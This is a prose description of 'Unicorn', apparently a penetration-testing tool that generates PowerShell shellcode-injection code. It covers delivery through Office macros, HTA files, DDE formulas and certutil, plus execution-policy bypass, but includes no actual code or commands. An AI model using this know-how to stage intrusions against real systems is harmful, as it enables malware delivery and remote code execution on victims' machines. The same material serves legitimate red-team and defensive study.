Unicorn Magic

Unicorn Magic provides a simple method to execute PowerShell downgrade attacks based on techniques by Matthew Graeber, David Kennedy, and Josh Kelly. It generates ready-to-use PowerShell code for injecting shellcode into memory, supporting Metasploit payloads and windows/download_exec. Output files include powershell_attack.txt with the injection code and unicorn.rc for Metasploit listeners. Use cases include remote command injection via Excel/Word docs, psexec, SQLi, or other delivery systems.

The tool supports multiple attack vectors: Office macros (Auto_Open or AutoOpen), HTA files (index.html and Launcher.hta), certutil for binary transfer via base64, custom PS1 encoding, DDE Office COM for macro-less execution, and Cobalt Strike beacon import. For macros, enable Developer tab in Office; for HTA, users must allow content; DDE requires hosting a download.ps1 file. Custom shellcode and SettingContent-ms generation are also available.

It requires Metasploit for certain payloads and works on native x86 Windows platforms. Generated code often bypasses restrictions using techniques like IEX for downloads and command masking.

Unicorn Magic leverages PowerShell downgrade attacks to bypass execution policies and inject shellcode into memory without dropping files. It parses Metasploit payloads or custom shellcode (hex format like 0x00 or raw), encodes them into PowerShell scripts using techniques from Graeber's attacks. For vectors like macro/HTA/DDE, it formats code for VBA, HTML applications, or Office field formulas. Listeners are set via unicorn.rc in msfconsole. Download_exec fetches and runs remote payloads; certutil converts base64 binaries; DDE uses COM objects like DDEInitialize/DDEExecute for RCE.